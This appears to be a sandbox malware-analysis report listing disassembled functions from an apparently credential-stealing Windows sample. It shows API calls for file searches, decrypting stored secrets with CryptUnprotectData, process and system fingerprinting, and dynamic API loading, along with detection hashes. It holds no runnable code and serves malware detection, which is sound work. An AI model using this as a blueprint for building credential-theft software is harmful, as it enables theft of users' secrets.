Password, xrefs: 00EE6E01

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: 52b0247806563f46fc4744ef18dc683f885fd2889c542f6d80199a87b6751b7e
Instruction ID: cdc14880782c4bfa604718561f1ff25fe2378483c5e3220e9ad3bea1524a5927
Opcode Fuzzy Hash: 52b0247806563f46fc4744ef18dc683f885fd2889c542f6d80199a87b6751b7e
Instruction Fuzzy Hash: D9613AB59001AC9BDB24DB50DC45BEAB3B8BF54344F0081E9E289B6285DBB05FC9CF90

Function 00EED1F0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EFED00,00EFE73E), ref: 00EED25B
StrCmpCA.SHLWAPI(?,00EFED04), ref: 00EED2A3
StrCmpCA.SHLWAPI(?,00EFED08), ref: 00EED2B9
FindNextFileA.KERNELBASE(000000FF,?), ref: 00EED51E
FindClose.KERNEL32(000000FF), ref: 00EED530

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 04a0005c321e75684ddfe4991e105cf805e745c6c9bfbe6ddaa0a574538273b1
Instruction ID: 1555c5d2ba1bcf260357e1888048c3964071518e66d544a69b3a67c0f2916aa2
Opcode Fuzzy Hash: 04a0005c321e75684ddfe4991e105cf805e745c6c9bfbe6ddaa0a574538273b1
Instruction Fuzzy Hash: B8911F7290020C9BCF18FF70DD569FD73B9AF94300F1056A8FA16A6585EF34AB588B91

Function 00EEDB90 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF8740: lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
Part of subcall function 00EF8740: lstrcat.KERNEL32(00000000), ref: 00EF87A2

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EFE74A), ref: 00EEDC02
StrCmpCA.SHLWAPI(?,00EFED48), ref: 00EEDC52
StrCmpCA.SHLWAPI(?,00EFED4C), ref: 00EEDC68
FindNextFileA.KERNEL32(000000FF,?), ref: 00EEE336

Strings

\*.*, xrefs: 00EEDBAD
), xrefs: 00EEE34C, 00EEDD4B, 00EEDE7C, 00EEDFBB, 00EEDC19, 00EEDD4E, 00EEDE7F, 00EEDFBE

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: )$\*.*
API String ID: 433455689-4130583844
Opcode ID: a45453c7fe95d271b516a79f0c2fdb863e4bc43a22b69ebfcb16d57f93d6b3ed
Instruction ID: a239d5e31e67e277f02a42fe5a2e44b825b72ab688d58262947298b13f5a27d6
Opcode Fuzzy Hash: a45453c7fe95d271b516a79f0c2fdb863e4bc43a22b69ebfcb16d57f93d6b3ed
Instruction Fuzzy Hash: 6A12FD7191011C9ACF18FB60DE96AFEB3B9AF54300F4061E9A60AB6491EF746B48CF51

Function 00EF5A60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

GetKeyboardLayoutList.USER32(00000000,00000000,00EFE12A), ref: 00EF5AB1
LocalAlloc.KERNEL32(00000040,?), ref: 00EF5AC9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00EF5ADD
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00EF5B32
LocalFree.KERNEL32(00000000), ref: 00EF5BF2

Strings

/ , xrefs: 00EF5B4F

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 4a288eb877b5ae12c1086933d24624274cc54070ad4da22ceca260010b776d1b
Instruction ID: 8e9bf755ddcf13b83f6331501af2fb04143260141fc045549cd9be5e33724b33
Opcode Fuzzy Hash: 4a288eb877b5ae12c1086933d24624274cc54070ad4da22ceca260010b776d1b
Instruction Fuzzy Hash: A541187294021CABDB24DF94DD99BEEB3B8EB58700F2051D9E209B6180DB742F84CF61

Function 00EF7510 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF752E
Process32First.KERNEL32(00EFE4B7,00000128), ref: 00EF7542
Process32Next.KERNEL32(00EFE4B7,00000128), ref: 00EF7557
StrCmpCA.SHLWAPI(?,00000000), ref: 00EF756C
CloseHandle.KERNEL32(00EFE4B7), ref: 00EF758A

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 88e8921b4c0fbc293f97bb2398d78a50f2a3336a5ffce8dc53bbc431cb3e842b
Instruction ID: b39773c8409d669b7bf68cbc05b4e6b58f5b0ea65b94c482221a8e302c421c31
Opcode Fuzzy Hash: 88e8921b4c0fbc293f97bb2398d78a50f2a3336a5ffce8dc53bbc431cb3e842b
Instruction Fuzzy Hash: B0015E75A0420CEBCB25DFA0D848BEDB7B9EB08300F108199A945A7244EB749F80CF50

Function 00EF6550 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EF659A
Process32First.KERNEL32(?,00000128), ref: 00EF65AE
Process32Next.KERNEL32(?,00000128), ref: 00EF65C3

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

FindCloseChangeNotification.KERNEL32(?), ref: 00EF6631

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: ebe1efbc2d3231b14c9eda012be4c173286307de8b1ab9050f59af05076354d2
Instruction ID: 49d3ca2e86a507311eceb9976b9e08fe5f0faf1ffcc3ddc3d4c7b5834e876592
Opcode Fuzzy Hash: ebe1efbc2d3231b14c9eda012be4c173286307de8b1ab9050f59af05076354d2
Instruction Fuzzy Hash: 7C312A7190121CABCB28EF51DD45BFEB7B8EB45700F105199B20AB61A0DF746A44CFA1

Function 00EF5900 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000), ref: 00EF5933
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000,?), ref: 00EF593A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013303C8,00000000,?,00EFE7B8,00000000,?,00000000,00000000,?), ref: 00EF594D
wsprintfA.USER32 ref: 00EF5987

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 9f6dce6b009e8b887a19e5a9903ac45aa2bb3e75aae2cfa667ab32790fd34db1
Instruction ID: cf17a03f1e3a107d104ddc4c40d298f1fa55bd6ebd75e151a00f115ecb10aa26
Opcode Fuzzy Hash: 9f6dce6b009e8b887a19e5a9903ac45aa2bb3e75aae2cfa667ab32790fd34db1
Instruction Fuzzy Hash: EA118E71D45618EBEB24CF54DC45FAABB78FB44721F1043A9E62AA32C4C7B41A40CF51

Function 00EE9560 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EE9584
LocalAlloc.KERNEL32(00000040,00000000), ref: 00EE95A3
LocalFree.KERNEL32(?), ref: 00EE95CF

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 6f59bb876f57d41eb60b4c30d9746cd83a4521a9efd847029d22b4bdfa6714a7
Instruction ID: 6264367516ff2c23db773bb4a103981d2d43c7522e284e9cf5371d469fd0fb89
Opcode Fuzzy Hash: 6f59bb876f57d41eb60b4c30d9746cd83a4521a9efd847029d22b4bdfa6714a7
Instruction Fuzzy Hash: 8111B7B8A00209EFCB05DF94C984AAEB7B5FF88300F104598E915A7394D774AE54CF61

Function 00EF5720 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EE1177), ref: 00EF5750
HeapAlloc.KERNEL32(00000000,?,?,?,00EE1177), ref: 00EF5757
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EF576F

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: b8fe56604d254f837caf293e1d6ef5c9e85038d06c0f4c9751f6ac758901f3f5
Instruction ID: b5a1bd25680da578e95981f1d32361cc6663f4617dcfaf9252a834d58adc40e5
Opcode Fuzzy Hash: b8fe56604d254f837caf293e1d6ef5c9e85038d06c0f4c9751f6ac758901f3f5
Instruction Fuzzy Hash: 41F04FB1D4460DEFCB14DF98D845BAEBBB8FB08721F10022AF615E2680C7B45544CBA1

Function 00EF5DA0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00EFE7D4), ref: 00EF5DD0
wsprintfA.USER32 ref: 00EF5DE6

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: d250842085a916cecec836515b75379fd53e8b1fd2f345eb26d78e9c76e3e413
Instruction ID: 0834404dc1f8c2273f80727ea95e792879d946f932eb46c7627c40c400311aea
Opcode Fuzzy Hash: d250842085a916cecec836515b75379fd53e8b1fd2f345eb26d78e9c76e3e413
Instruction Fuzzy Hash: 36F0F6B1D0020CEBCB14CF84DC45FAAF77CFB04710F004669F615A3280D3B829048BA1

Function 00EF7A60 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,013287D8), ref: 00EF7A7D
GetProcAddress.KERNEL32(74DD0000,01328738), ref: 00EF7A95
GetProcAddress.KERNEL32(74DD0000,01323B10), ref: 00EF7AAE
GetProcAddress.KERNEL32(74DD0000,01323B70), ref: 00EF7AC6
GetProcAddress.KERNEL32(74DD0000,01323B88), ref: 00EF7ADE
GetProcAddress.KERNEL32(74DD0000,01323CD8), ref: 00EF7AF7
GetProcAddress.KERNEL32(74DD0000,0132BAA8), ref: 00EF7B0F
GetProcAddress.KERNEL32(74DD0000,01323BA0), ref: 00EF7B27
GetProcAddress.KERNEL32(74DD0000,01323E10), ref: 00EF7B40
GetProcAddress.KERNEL32(74DD0000,01323E40), ref: 00EF7B58
GetProcAddress.KERNEL32(74DD0000,01323E58), ref: 00EF7B70
GetProcAddress.KERNEL32(74DD0000,01328618), ref: 00EF7B89
GetProcAddress.KERNEL32(74DD0000,01328478), ref: 00EF7BA1
GetProcAddress.KERNEL32(74DD0000,01328638), ref: 00EF7BB9
GetProcAddress.KERNEL32(74DD0000,013286B8), ref: 00EF7BD2
GetProcAddress.KERNEL32(74DD0000,01323E70), ref: 00EF7BEA
GetProcAddress.KERNEL32(74DD0000,01323DC8), ref: 00EF7C02
GetProcAddress.KERNEL32(74DD0000,0132B7B0), ref: 00EF7C1B
GetProcAddress.KERNEL32(74DD0000,013286D8), ref: 00EF7C33
GetProcAddress.KERNEL32(74DD0000,01323E28), ref: 00EF7C4B
GetProcAddress.KERNEL32(74DD0000,01323E88), ref: 00EF7C64
GetProcAddress.KERNEL32(74DD0000,01323DE0), ref: 00EF7C7C
GetProcAddress.KERNEL32(74DD0000,01323DF8), ref: 00EF7C94
GetProcAddress.KERNEL32(74DD0000,01328498), ref: 00EF7CAD
GetProcAddress.KERNEL32(74DD0000,0132FAF8), ref: 00EF7CC5
GetProcAddress.KERNEL32(74DD0000,0132FB10), ref: 00EF7CDD
GetProcAddress.KERNEL32(74DD0000,0132FA20), ref: 00EF7CF6
GetProcAddress.KERNEL32(74DD0000,0132F9C0), ref: 00EF7D0E
GetProcAddress.KERNEL32(74DD0000,0132F9A8), ref: 00EF7D26
GetProcAddress.KERNEL32(74DD0000,0132F930), ref: 00EF7D3F
GetProcAddress.KERNEL32(74DD0000,0132FA98), ref: 00EF7D57
GetProcAddress.KERNEL32(74DD0000,0132FA50), ref: 00EF7D6F
GetProcAddress.KERNEL32(74DD0000,0132F8B8), ref: 00EF7D88
GetProcAddress.KERNEL32(74DD0000,01324B98), ref: 00EF7DA0
GetProcAddress.KERNEL32(74DD0000,0132F948), ref: 00EF7DB8
GetProcAddress.KERNEL32(74DD0000,0132FAC8), ref: 00EF7DD1
GetProcAddress.KERNEL32(74DD0000,01328718), ref: 00EF7DE9
GetProcAddress.KERNEL32(74DD0000,0132F990), ref: 00EF7E01
GetProcAddress.KERNEL32(74DD0000,01328758), ref: 00EF7E1A
GetProcAddress.KERNEL32(74DD0000,0132FA80), ref: 00EF7E32
GetProcAddress.KERNEL32(74DD0000,0132F9D8), ref: 00EF7E4A
GetProcAddress.KERNEL32(74DD0000,01328198), ref: 00EF7E63
GetProcAddress.KERNEL32(74DD0000,013280F8), ref: 00EF7E7B
LoadLibraryA.KERNEL32(0132F900,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7E8D
LoadLibraryA.KERNEL32(0132F918,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7E9E
LoadLibraryA.KERNEL32(0132FB28,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7EB0
LoadLibraryA.KERNEL32(0132F9F0,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7EC2
LoadLibraryA.KERNEL32(0132F978,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7ED3
LoadLibraryA.KERNEL32(0132F960,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7EE5
LoadLibraryA.KERNEL32(0132FA08,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7EF7
LoadLibraryA.KERNEL32(0132FA38,?,00EF3E9C,?,00000030,00000064,00EF4530,?,0000002C,00000064,00EF44D0,?,00000030,00000064,Function_000143C0,?), ref: 00EF7F08
GetProcAddress.KERNEL32(75290000,013281B8), ref: 00EF7F2A
GetProcAddress.KERNEL32(75290000,0132FB40), ref: 00EF7F42
GetProcAddress.KERNEL32(75290000,0132D608), ref: 00EF7F5A
GetProcAddress.KERNEL32(75290000,0132FAE0), ref: 00EF7F73
GetProcAddress.KERNEL32(75290000,01328258), ref: 00EF7F8B
GetProcAddress.KERNEL32(6FDD0000,0132B8C8), ref: 00EF7FB0
GetProcAddress.KERNEL32(6FDD0000,01328058), ref: 00EF7FC9
GetProcAddress.KERNEL32(6FDD0000,0132B8A0), ref: 00EF7FE1
GetProcAddress.KERNEL32(6FDD0000,0132FA68), ref: 00EF7FF9
GetProcAddress.KERNEL32(6FDD0000,0132FAB0), ref: 00EF8012
GetProcAddress.KERNEL32(6FDD0000,01328078), ref: 00EF802A
GetProcAddress.KERNEL32(6FDD0000,01328378), ref: 00EF8042
GetProcAddress.KERNEL32(6FDD0000,0132F858), ref: 00EF805B
GetProcAddress.KERNEL32(752C0000,01328098), ref: 00EF807C
GetProcAddress.KERNEL32(752C0000,013281D8), ref: 00EF8094
GetProcAddress.KERNEL32(752C0000,0132F870), ref: 00EF80AD
GetProcAddress.KERNEL32(752C0000,0132F888), ref: 00EF80C5
GetProcAddress.KERNEL32(752C0000,01328178), ref: 00EF80DD
GetProcAddress.KERNEL32(74EC0000,0132BA58), ref: 00EF8103
GetProcAddress.KERNEL32(74EC0000,0132BA80), ref: 00EF811B
GetProcAddress.KERNEL32(74EC0000,0132F8A0), ref: 00EF8133
GetProcAddress.KERNEL32(74EC0000,01328338), ref: 00EF814C
GetProcAddress.KERNEL32(74EC0000,01328438), ref: 00EF8164
GetProcAddress.KERNEL32(74EC0000,0132B7D8), ref: 00EF817C
GetProcAddress.KERNEL32(75BD0000,0132F8D0), ref: 00EF81A2
GetProcAddress.KERNEL32(75BD0000,013281F8), ref: 00EF81BA
GetProcAddress.KERNEL32(75BD0000,0132D4F8), ref: 00EF81D2
GetProcAddress.KERNEL32(75BD0000,0132F8E8), ref: 00EF81EB
GetProcAddress.KERNEL32(75BD0000,0132FC00), ref: 00EF8203
GetProcAddress.KERNEL32(75BD0000,01328298), ref: 00EF821B
GetProcAddress.KERNEL32(75BD0000,01328358), ref: 00EF8234
GetProcAddress.KERNEL32(75BD0000,0132FB70), ref: 00EF824C
GetProcAddress.KERNEL32(75BD0000,0132FBB8), ref: 00EF8264
GetProcAddress.KERNEL32(75A70000,013282B8), ref: 00EF8286
GetProcAddress.KERNEL32(75A70000,0132FB58), ref: 00EF829E
